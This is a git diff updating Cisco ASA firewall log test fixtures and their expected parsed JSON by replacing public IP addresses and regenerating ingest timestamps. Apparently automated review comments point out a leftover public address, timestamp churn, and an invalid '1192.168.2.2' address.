-Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 91.240.17.178, Username = 91.240.17.178, IP = 91.240.17.178, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested
+Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 81.2.69.144, IP = 81.2.69.144, Security negotiation complete for LAN-to-LAN Group (81.2.69.144) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d
+Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.144, Username = 81.2.69.144, IP = 81.2.69.144, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested
 Apr 27 02:03:03 dev01: %ASA-4-722051: Group User IP <192.168.50.3> IPv4 Address <192.168.50.5> IPv6 address <::> assigned to session
-Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested.
+Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 81.2.69.144 WebVPN session terminated: User Requested.
 Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout.
-Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 104.46.88.19/6370 to outside:195.74.114.34/23
-Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:91.240.17.178/8888 to destinationInterfaceName:192.168.2.2/123123 locally
-Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:91.240.17.138/8888 to destinationInterfaceName:192.168.2.2/514514
-Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:91.240.17.178/7777 to 192.168.2.2/123412
-Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:91.240.17.178/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number
-Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been created.
-Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been deleted.
-Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request
-Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database
-Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.128.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)
-Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.64.157.61, Duplicate first packet detected. Ignoring packet.
-Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!
+Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 81.2.69.144/6370 to outside:192.168.157.61/23
+Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/123123 locally
+Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/514514
+Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.144/7777 to 192.168.2.2/123412
+Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.144/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number
+Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been created.
+Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been deleted.
+Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request
+Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database
+Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.168.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)
+Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.168.157.61, Duplicate first packet detected. Ignoring packet.
+Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!
 Apr 27 2020 02:03:03 dev01: %ASA-6-713904: All IPSec SA proposals found unacceptable!
-Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.128.1.1, All IPSec SA proposals found unacceptable!
+Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.168.1.1, All IPSec SA proposals found unacceptable!
 Apr 27 2020 02:03:03 dev01: %ASA-6-713902: Group = 100.60.140.10, All IPSec SA proposals found unacceptable!
-Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!
+Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!
diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json
index 1d02ce1233b..e7edee78768 100644
--- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json
+++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json
@@ -6,7 +6,7 @@ }, "destination": { "nat": { - "ip": "8.8.5.4" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 53500, @@ -14,7 +14,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 53500, @@ -54,9 +54,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.8", - "192.168.2.2", - "8.8.5.4" + "81.2.69.144", + "192.168.2.2" ] }, "host": { @@ -64,8 +63,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086480145Z", - "original": "May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)", + "ingested": "2021-12-09T13:31:25.162829200Z", + "original": "May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)", "code": "302013", "kind": "event", "action": "firewall-rule", 
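Review bot: `100.60.140.10` is left unchanged on the new %ASA-5-713120, %ASA-6-713905 and %ASA-6-713901 lines (and on the 713902 context line), yet it sits below the 100.64.0.0/10 shared address space and is therefore a public address, which is inconsistent with the rest of this hunk moving every public value to the supported set. If the `Group =` value is meant to stay a stable, non-geolocated identifier, a one-line comment in the commit description saying so would stop the next sweep from flagging it; otherwise `Group = 81.2.69.144` (or another supported address) on those four lines would complete the change. The `IP =` replacements with `192.168.1.1` and `192.168.157.61` look consistent with the rest of the file.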
@@ -80,8 +79,8 @@ "asa": { "destination_interface": "fw111", "mapped_source_port": 53500, - "mapped_destination_ip": "8.8.5.4", - "mapped_source_ip": "8.8.8.8", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "111111111", "source_interface": "net", "mapped_destination_port": 53500 @@ -94,7 +93,7 @@ }, "destination": { "nat": { - "ip": "8.8.5.4" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 53500, @@ -102,7 +101,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 53500, @@ -142,9 +141,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.8", - "192.168.2.2", - "8.8.5.4" + "81.2.69.144", + "192.168.2.2" ] }, "host": { @@ -152,8 +150,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086488034Z", - "original": "May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)", + "ingested": "2021-12-09T13:31:25.162839Z", + "original": "May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -168,8 +166,8 @@ "asa": { "destination_interface": "fw111", "mapped_source_port": 53500, - "mapped_destination_ip": "8.8.5.4", - "mapped_source_ip": "8.8.8.8", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "111111111", "source_interface": "net", "mapped_destination_port": 53500 @@ -186,7 +184,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "ip": "192.168.2.2" @@ -214,7 +212,7 @@ ], "ip": [ "192.168.2.2", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -223,8 +221,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086490223Z", - "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3", + "ingested": "2021-12-09T13:31:25.162845100Z", + "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3", "code": "302020", "kind": "event", "action": "flow-expiration", @@ -238,7 +236,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8", + "mapped_source_ip": "81.2.69.144", "icmp_type": 3, "icmp_code": 3 } @@ -284,7 +282,7 @@ "event": { "severity": 7, "duration": 0, - "ingested": "2021-07-19T09:05:57.086492152Z", + "ingested": "2021-12-09T13:31:25.162851100Z", "original": "May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00", "code": "609002", "kind": "event", @@ -344,7 +342,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:05:57.086493854Z", + "ingested": "2021-12-09T13:31:25.162855800Z", "original": "May 5 17:51:17 dev01: %FTD-7-609001: Built local-host net:192.168.2.2", "code": "609001", "kind": "event", @@ -373,7 +371,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "ip": "192.168.2.2" @@ -401,7 +399,7 @@ ], "ip": [ "192.168.2.2", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -410,8 +408,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086495542Z", - "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 1", + "ingested": "2021-12-09T13:31:25.162861200Z", + "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 1", "code": "302020", "kind": "event", "action": "flow-expiration", 
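Review bot: Every hunk in this file, including `@@ -284,7` and `@@ -344,7` here that change nothing else, rewrites `event.ingested` to the regeneration wall-clock time, which buries the substantive IP changes and will recur on every future regeneration. If the pipeline test config for this data stream does not already list `event.ingested` under `dynamic_fields`, adding it would let the expected file stop carrying a timestamp at all. Failing that, the timestamp-only hunks could be left out of this change so the diff reads as the IP sweep the changelog describes.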
@@ -425,7 +423,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8", + "mapped_source_ip": "81.2.69.144", "icmp_type": 3, "icmp_code": 1 } @@ -437,7 +435,7 @@ }, "destination": { "nat": { - "ip": "8.8.5.4" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 111, @@ -445,7 +443,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 111, @@ -483,9 +481,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.8", - "192.168.2.2", - "8.8.5.4" + "81.2.69.144", + "192.168.2.2" ] }, "host": { @@ -493,8 +490,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086497218Z", - "original": "May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (8.8.8.8/111) to fw111:192.168.2.2/111 (8.8.5.4/111)", + "ingested": "2021-12-09T13:31:25.162867800Z", + "original": "May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (81.2.69.144/111) to fw111:192.168.2.2/111 (81.2.69.144/111)", "code": "805001", "kind": "event", "action": "firewall-rule", @@ -509,8 +506,8 @@ "asa": { "destination_interface": "fw111", "mapped_source_port": 111, - "mapped_destination_ip": "8.8.5.4", - "mapped_source_ip": "8.8.8.8", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "111111111", "source_interface": "fw111", "mapped_destination_port": 111 @@ -572,7 +569,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086498881Z", + "ingested": "2021-12-09T13:31:25.162873700Z", "original": "May 5 17:51:17 dev01: %FTD-6-805002: TCP Flow is no longer offloaded for connection 941243214 from net:10.192.18.4/51261 (10.192.18.4/51261) to fw109:10.192.70.66/443 (10.192.70.66/443)", "code": "805002", "kind": "event", 
@@ -646,7 +643,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:05:57.086500586Z", + "ingested": "2021-12-09T13:31:25.162880900Z", "original": "May 5 17:51:17 dev01: %FTD-7-710005: UDP request discarded from 192.168.2.2/68 to fw111:10.10.10.10/67", "code": "710005", "kind": "event", @@ -728,7 +725,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086502259Z", + "ingested": "2021-12-09T13:31:25.162886600Z", "original": "May 5 17:51:17 dev01: %FTD-6-303002: FTP connection from net:192.168.2.2/63656 to fw111:10.192.18.4/21, user testuser Stored file /export/home/sysm/ftproot/sdsdsds/tmp.log", "code": "303002", "kind": "event", @@ -771,7 +768,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:05:57.086503922Z", + "ingested": "2021-12-09T13:31:25.162890900Z", "original": "May 5 17:51:17 dev01: %FTD-7-710006: VRRP request discarded from 192.168.2.2 to fw111:192.18.4", "code": "710006", "kind": "event", @@ -826,8 +823,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086505920Z", - "original": "May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 8.8.8.8/10872.", + "ingested": "2021-12-09T13:31:25.162896700Z", + "original": "May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 81.2.69.144/10872.", "code": "313005", "kind": "event", "action": "firewall-rule", @@ -854,7 +851,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "ip": "10.10.10.10" @@ -882,7 +879,7 @@ ], "ip": [ "10.10.10.10", - "8.8.8.8", + "81.2.69.144", "192.168.2.2" ] }, 
@@ -891,8 +888,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086507628Z", - "original": "May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 8.8.8.8/2 laddr 10.10.10.10/2 type 8 code 0", + "ingested": "2021-12-09T13:31:25.162903400Z", + "original": "May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 81.2.69.144/2 laddr 10.10.10.10/2 type 8 code 0", "code": "302021", "kind": "event", "action": "flow-expiration", @@ -906,7 +903,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8", + "mapped_source_ip": "81.2.69.144", "icmp_type": 8, "icmp_code": 0 } @@ -951,7 +948,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:05:57.086509334Z", + "ingested": "2021-12-09T13:31:25.162910Z", "original": "May 5 18:22:35 dev01: %ASA-7-609001: Built local-host net:10.10.10.10", "code": "609001", "kind": "event", @@ -1010,7 +1007,7 @@ "event": { "severity": 7, "duration": 0, - "ingested": "2021-07-19T09:05:57.086511048Z", + "ingested": "2021-12-09T13:31:25.162916500Z", "original": "May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00", "code": "609002", "kind": "event", @@ -1041,7 +1038,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.192.46.90", "ip": "10.192.46.90" @@ -1069,7 +1066,7 @@ ], "ip": [ "10.192.46.90", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1078,8 +1075,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086512745Z", - "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 10.192.46.90/0", + "ingested": "2021-12-09T13:31:25.162923100Z", + "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 10.192.46.90/0", "code": "302020", "kind": "event", "action": "flow-expiration", 
@@ -1093,7 +1090,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8" + "mapped_source_ip": "81.2.69.144" } } }, @@ -1107,7 +1104,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "ip": "192.168.2.2" @@ -1135,7 +1132,7 @@ ], "ip": [ "192.168.2.2", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1144,8 +1141,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086514613Z", - "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3", + "ingested": "2021-12-09T13:31:25.162929900Z", + "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3", "code": "302020", "kind": "event", "action": "flow-expiration", @@ -1159,7 +1156,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8", + "mapped_source_ip": "81.2.69.144", "icmp_type": 3, "icmp_code": 3 } @@ -1223,7 +1220,7 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:05:57.086516327Z", + "ingested": "2021-12-09T13:31:25.162936400Z", "original": "May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I", "code": "302014", "kind": "event", @@ -1252,7 +1249,7 @@ }, "destination": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 54839, @@ -1260,7 +1257,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 80, @@ -1300,7 +1297,7 @@ ], "ip": [ "192.168.2.2", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1309,8 +1306,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086517980Z", - "original": "May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (8.8.8.8/80) to net:10.10.10.10/54839 (8.8.8.8/54839)", + "ingested": "2021-12-09T13:31:25.162942900Z", + "original": "May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (81.2.69.144/80) to net:10.10.10.10/54839 (81.2.69.144/54839)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -1325,8 +1322,8 @@ "asa": { "destination_interface": "net", "mapped_source_port": 80, - "mapped_destination_ip": "8.8.8.8", - "mapped_source_ip": "8.8.8.8", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "1588662", "source_interface": "intfacename", "mapped_destination_port": 54839 @@ -1389,7 +1386,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:05:57.086519682Z", + "ingested": "2021-12-09T13:31:25.162949400Z", "original": "May 5 18:29:32 dev01: %ASA-6-302012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00", "code": "302012", "kind": "event", @@ -1459,7 +1456,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086521342Z", + "ingested": "2021-12-09T13:31:25.162956Z", "original": "May 5 18:40:50 dev01: %ASA-4-313004: Denied ICMP type=0, from laddr 10.10.10.10 on interface fw502 to 192.168.2.2: no matching session", "code": "313004", "kind": "event", @@ -1535,7 +1532,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086523016Z", + "ingested": "2021-12-09T13:31:25.162962600Z", "original": "May 5 18:40:50 dev01: %ASA-6-305011: Built dynamic TCP translation from fw111:10.10.10.10/57006 to out111:192.168.2.2/57006", "code": "305011", "kind": "event", 
@@ -1605,7 +1602,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:05:57.086524660Z", + "ingested": "2021-12-09T13:31:25.162969500Z", "original": "May 5 18:40:50 dev01: %ASA-2-106001: Inbound TCP connection denied from 192.168.2.2/43803 to 10.10.10.10/14322 flags SYN on interface out111", "code": "106001", "kind": "event", @@ -1630,27 +1627,9 @@ "level": "critical" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Thousand Oaks", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", - "location": { - "lon": -118.8199, - "lat": 34.197 - } - }, - "as": { - "number": 395776, - "organization": { - "name": "FEDERAL ONLINE GROUP LLC" - } - }, - "address": "192.186.2.2", "port": 53356, - "ip": "192.186.2.2" + "address": "1192.168.2.2", + "domain": "1192.168.2.2" }, "source": { "port": 161, @@ -1687,11 +1666,11 @@ }, "related": { "hosts": [ - "dev01" + "dev01", + "1192.168.2.2" ], "ip": [ - "10.10.10.10", - "192.186.2.2" + "10.10.10.10" ] }, "host": { @@ -1700,8 +1679,8 @@ "event": { "severity": 2, "duration": 124000000000, - "ingested": "2021-07-19T09:05:57.086526496Z", - "original": "May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:192.186.2.2/53356 duration 0:02:04 bytes 64585", + "ingested": "2021-12-09T13:31:25.162976200Z", + "original": "May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:1192.168.2.2/53356 duration 0:02:04 bytes 64585", "code": "302016", "kind": "event", "start": "2021-05-05T18:38:46.000Z", @@ -1729,7 +1708,7 @@ }, "destination": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 22638, @@ -1737,7 +1716,7 @@ }, "source": { "nat": { - "ip": "8.8.8.4" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 161, 
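Review bot: In the `@@ -1630,27` hunk the expected destination becomes `"address": "1192.168.2.2"` plus `"domain": "1192.168.2.2"`, and the `@@ -1700,8` original now reads `net:1192.168.2.2/53356`; a first octet of 1192 is not a valid IPv4 address, which is why the regenerated expectation carries it as `destination.domain` and in `related.hosts` while `destination.ip` and the destination entry of `related.ip` disappear. This looks like a typo for `192.168.2.2` that the regeneration has locked in rather than caught; correcting the input log line would restore the `destination.ip` assertion. The `@@ -2528,8` hunk further down carries a similar pre-existing `net:192.1682.2.2/10051` on its new side that the same pass could fix.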
@@ -1777,9 +1756,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.4", - "192.168.2.2", - "8.8.8.8" + "81.2.69.144", + "192.168.2.2" ] }, "host": { @@ -1787,8 +1765,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:05:57.086528138Z", - "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)", + "ingested": "2021-12-09T13:31:25.162982800Z", + "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1803,8 +1781,8 @@ "asa": { "destination_interface": "net", "mapped_source_port": 161, - "mapped_destination_ip": "8.8.8.8", - "mapped_source_ip": "8.8.8.4", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "1743372", "source_interface": "intfacename", "mapped_destination_port": 22638 @@ -1817,7 +1795,7 @@ }, "destination": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 22638, @@ -1825,7 +1803,7 @@ }, "source": { "nat": { - "ip": "8.8.8.4" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 161, @@ -1865,9 +1843,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.4", - "192.168.2.2", - "8.8.8.8" + "81.2.69.144", + "192.168.2.2" ] }, "host": { 
@@ -1875,8 +1852,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:05:57.086529828Z", - "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)", + "ingested": "2021-12-09T13:31:25.162992400Z", + "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1891,8 +1868,8 @@ "asa": { "destination_interface": "net", "mapped_source_port": 161, - "mapped_destination_ip": "8.8.8.8", - "mapped_source_ip": "8.8.8.4", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "1743372", "source_interface": "intfacename", "mapped_destination_port": 22638 @@ -1954,7 +1931,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086531503Z", + "ingested": "2021-12-09T13:31:25.162997900Z", "original": "May 5 18:40:50 dev01: %ASA-4-106023: Deny tcp src fw111:10.10.10.10/64388 dst out111:192.168.2.2/443 by access-group \"out1111_access_out\" [0x47e21ef4, 0x47e21ef4]", "code": "106023", "kind": "event", @@ -2024,7 +2001,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086533203Z", + "ingested": "2021-12-09T13:31:25.163003300Z", "original": "May 5 18:40:50 dev01: %ASA-4-106021: Deny TCP reverse path check from 192.168.2.2 to 10.10.10.10 on interface fw111", "code": "106021", "kind": "event", @@ -2095,7 +2072,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:05:57.086534863Z", + "ingested": "2021-12-09T13:31:25.163009800Z", "original": "May 5 19:02:58 dev01: %ASA-2-106006: Deny inbound UDP from 192.168.2.2/65020 to 10.10.10.10/65020 on interface fw111", "code": "106006", "kind": "event", 
@@ -2165,7 +2142,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:05:57.086536607Z",
+ "ingested": "2021-12-09T13:31:25.163016400Z",
 "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/53089 to 10.10.10.10/443 flags FIN PSH ACK on interface out111",
 "code": "106015",
 "kind": "event",
@@ -2235,7 +2212,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:05:57.086538302Z",
+ "ingested": "2021-12-09T13:31:25.163020900Z",
 "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/17127 to 10.10.10.10/443 flags PSH ACK on interface out111",
 "code": "106015",
 "kind": "event",
@@ -2305,7 +2282,7 @@
 },
 "event": {
